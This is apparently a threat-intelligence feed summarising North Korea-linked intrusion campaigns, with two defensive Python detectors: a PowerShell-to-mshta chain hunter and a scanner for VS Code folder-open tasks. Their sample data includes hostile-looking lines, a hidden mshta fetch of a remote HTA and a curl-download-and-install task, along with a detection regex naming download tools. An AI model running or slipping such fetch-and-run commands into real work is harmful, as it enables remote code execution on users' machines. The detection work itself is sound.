North Korean-linked operators were tied to two major April 2026 DeFi thefts and a software supply-chain compromise. Drift Protocol lost about $280 million after attackers spent months posing as a legitimate trading firm, obtained pre-signed multisig appro…
387 reports
Lazarus-linked operators are using a three-stage malware framework, DPAPILoader, RemotePELoader, and RemotePE, to maintain stealthy long-term access in financial and cryptocurrency environments. DPAPILoader decrypts victim-bound payloads with Windows DPAP…
The episode shows how campaign infrastructure can be misclassified when analysts focus on a single observed role. A server first understood as an FTP exfiltration host was later tied to additional campaign-linked services. The source specifically connects…
Sapphire Sleet, also tracked as BlueNoroff and UNC1069, is targeting macOS users in venture capital, Web3, and cryptocurrency organizations through social engineering that delivers a fake Zoom SDK update. The infection chain uses Script Editor, `osascript…
A malicious npm package, js-logger-pack, evolved from a probe into a dropper for MicrosoftSystem64, a cross-platform Node.js Single Executable Application that functions as an infostealer and RAT. The payload targets browser credentials, more than 80 cryp…
ESET observed multiple North Korea-aligned groups targeting developers, cryptocurrency interests, strategic industries, and ethnic Korean communities from October 2025 through March 2026. Andariel deployed TigerRAT and attempted Rook ransomware against a …
Wiz identified JINX-0164, a previously unreported financially motivated actor targeting cryptocurrency organizations and developers through LinkedIn recruitment/business lures, fake conferencing pages, and malicious macOS “fix” scripts. The actor deploys …
ENKI Whitehat identified Kimsuky malware delivery activity through April 2026 against South Korean military and enterprise-related targets. The campaigns used tailored lures, including fake domestic security software installation pages and a fake Webex me…
ENKI Whitehat reported Kimsuky malware delivery cases targeting South Korean military and corporate environments through April 2026. The actor used fake security software installation pages and a Webex-themed lure based on a legitimate meeting schedule, w…
AhnLab observed malicious LNK files distributed under the guise of secure email from a well-known Korean card company, with a flow similar to earlier Kimsuky password-file lure activity but with changed initial commands. The LNK launches PowerShell and `mshta` to run an …
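The chain above (LNK to PowerShell to `mshta`) is a process-ancestry pattern rather than a file signature, so it is worth hunting on process-creation telemetry. The following is an added example, not code from AhnLab or from the report: it walks parent/child relationships in constructed Sysmon-style events (hypothetical sample data, not logs from the campaign) and flags any `mshta.exe` whose ancestry includes PowerShell, noting whether its command line pulls remote content.

```python
import re

# Constructed process-creation events (pid, parent pid, image, command line).
# Hypothetical sample data shaped like Sysmon Event ID 1, not real campaign logs.
SAMPLE_EVENTS = [
    {"pid": 410, "ppid": 100, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 522, "ppid": 410,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -WindowStyle Hidden -c "mshta http://198.51.100.7/update.hta"'},
    {"pid": 530, "ppid": 522, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://198.51.100.7/update.hta"},
    # Benign PowerShell use from the same explorer session: must not fire.
    {"pid": 610, "ppid": 410,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    # mshta launched by an installer, not by PowerShell: must not fire.
    {"pid": 700, "ppid": 100, "image": r"C:\Program Files\Vendor\installer.exe",
     "cmdline": r'"C:\Program Files\Vendor\installer.exe" /quiet'},
    {"pid": 710, "ppid": 700, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta C:\Program Files\Vendor\setup.hta"},
]

# http(s) URLs or UNC paths in an mshta command line mean the HTA is fetched remotely.
REMOTE = re.compile(r"https?://|\\\\[\w.-]+\\", re.I)

SHELLS = {"powershell.exe", "pwsh.exe"}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(events_by_pid, pid, limit=8):
    """Image names from the given process up its parent chain (child first).
    The seen-set guards against pid reuse creating a cycle in the sample."""
    chain, seen = [], set()
    while pid in events_by_pid and pid not in seen and len(chain) < limit:
        seen.add(pid)
        ev = events_by_pid[pid]
        chain.append(basename(ev["image"]))
        pid = ev["ppid"]
    return chain


def detect_powershell_mshta_chains(events):
    """Return one finding per mshta.exe whose ancestors include PowerShell."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        if basename(ev["image"]) != "mshta.exe":
            continue
        chain = ancestry(by_pid, ev["pid"])
        if not SHELLS.intersection(chain[1:]):
            continue
        findings.append({
            "pid": ev["pid"],
            "chain": " <- ".join(chain),
            "remote_content": bool(REMOTE.search(ev["cmdline"])),
            "cmdline": ev["cmdline"],
        })
    return findings


if __name__ == "__main__":
    for f in detect_powershell_mshta_chains(SAMPLE_EVENTS):
        print(f)
```

The walk up the parent chain, rather than a direct parent check, is deliberate: LNK-launched PowerShell frequently spawns `cmd.exe` or a second PowerShell before `mshta`, and a direct-parent rule would miss that variation. Tune the `limit` and the `SHELLS` set to the telemetry you actually collect.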
Proofpoint observed DPRK-aligned TA406, also known as Opal Sleet, chaining CVE-2026-21509 and CVE-2026-21510 in March and April 2026 email campaigns. The campaigns used visa-processing and diplomatic-initiative lures with RTF attachments that triggered Mi…
Hauri identified a new KimjongRAT variant related to malware previously disguised as a tax notice. The variant preserves earlier information-stealing behavior but expands collection to Telegram and Discord data, indicating broader targeting of user commun…
NK Internet observed 175.45.176.97 in the DPRK IP range returning a 302 redirect to recoshield.com between May 14 and May 17, 2026, with headers showing Apache on Rocky Linux and PHP. Further probing exposed a captive portal-style framework that checked G…
AhnLab observed April 2026 APT activity against South Korean targets, with most infections beginning through spear-phishing emails that used spoofed senders, malicious attachments, and malicious links. The activity relied heavily on LNK files, PowerShell,…
A fake Pulsynk recruiting email targeted a smart-contract security developer with instructions to clone a GitLab repository and open it in VS Code or Cursor. The repository abused a `.vscode/tasks.json` folder-open task to install a malicious VS Code exte…
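Because the trigger in the Pulsynk lure is a task configured to run when the folder is opened, the practical check is to inspect `.vscode/tasks.json` in a cloned repository before opening it in an editor. The following is an added example, not code from the report or from the repository it describes: it parses a constructed `tasks.json` (hypothetical content modelled on the folder-open abuse, including the `runOptions.runOn: "folderOpen"` setting VS Code uses for auto-run tasks) and lists every auto-run task with its full command line. The `SUSPICIOUS` pattern is a heuristic of this example's own choosing. One caveat a practitioner should keep in mind: VS Code's Workspace Trust prompt blocks such tasks while a folder is in Restricted Mode, so the lure's instructions to "just open it" are an attempt to get the target to click through that prompt.

```python
import json
import os
import re

# Constructed .vscode/tasks.json modelled on a folder-open auto-run task
# (hypothetical content, not the real repository's file). tasks.json is
# JSONC: comments and trailing commas are legal, so json.loads alone fails.
SAMPLE_TASKS_JSON = r'''{
  // Build tasks for this project
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
    },
    {
      "label": "setup-env",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/helper.vsix -o /tmp/h.vsix && code --install-extension /tmp/h.vsix",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    }
  ]
}'''

# Heuristic only: commands that fetch or install something at folder open.
SUSPICIOUS = re.compile(
    r"--install-extension|\bcurl\b|\bwget\b|Invoke-WebRequest|\biwr\b|"
    r"\bbash -c\b|powershell|osascript|base64", re.I)


def strip_jsonc(text):
    """Remove // and /* */ comments and trailing commas, leaving string
    contents (including URLs containing //) untouched."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char verbatim
                out.append(text[i + 1]); i += 2; continue
            if c == '"':
                in_str = False
            i += 1; continue
        if c == '"':
            in_str = True; out.append(c); i += 1; continue
        if text.startswith("//", i):
            j = text.find("\n", i); i = n if j == -1 else j; continue
        if text.startswith("/*", i):
            j = text.find("*/", i + 2); i = n if j == -1 else j + 2; continue
        if c == ",":                          # drop comma before } or ]
            j = i + 1
            while j < n and text[j] in " \t\r\n":
                j += 1
            if j < n and text[j] in "}]":
                i += 1; continue
        out.append(c); i += 1
    return "".join(out)


def parse_jsonc(text):
    return json.loads(strip_jsonc(text))


def command_text(task):
    """Flatten command, args and per-OS overrides into one searchable string."""
    parts = [task.get("command", "")]
    for a in task.get("args", []):
        parts.append(a if isinstance(a, str) else a.get("value", ""))
    for os_key in ("windows", "linux", "osx"):
        sub = task.get(os_key)
        if isinstance(sub, dict):
            parts.append(sub.get("command", ""))
    return " ".join(p for p in parts if p)


def find_auto_run_tasks(tasks_json_text):
    """Return every task VS Code would start automatically on folder open."""
    findings = []
    for task in parse_jsonc(tasks_json_text).get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = command_text(task)
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "command": cmd,
            "hidden": (task.get("presentation") or {}).get("reveal") == "never",
            "suspicious": bool(SUSPICIOUS.search(cmd)),
        })
    return findings


def scan_repo(repo_dir):
    """Scan a cloned repository; returns [] when it has no tasks.json."""
    path = os.path.join(repo_dir, ".vscode", "tasks.json")
    if not os.path.isfile(path):
        return []
    with open(path, encoding="utf-8-sig") as f:
        return find_auto_run_tasks(f.read())


if __name__ == "__main__":
    for f in find_auto_run_tasks(SAMPLE_TASKS_JSON):
        print(f)
```

Run `scan_repo` against the clone before opening it, and treat any `folderOpen` task as a reason to open the folder in Restricted Mode and read the command first; a `reveal: never` presentation on an auto-run task is the extra tell, since it hides the terminal the command runs in.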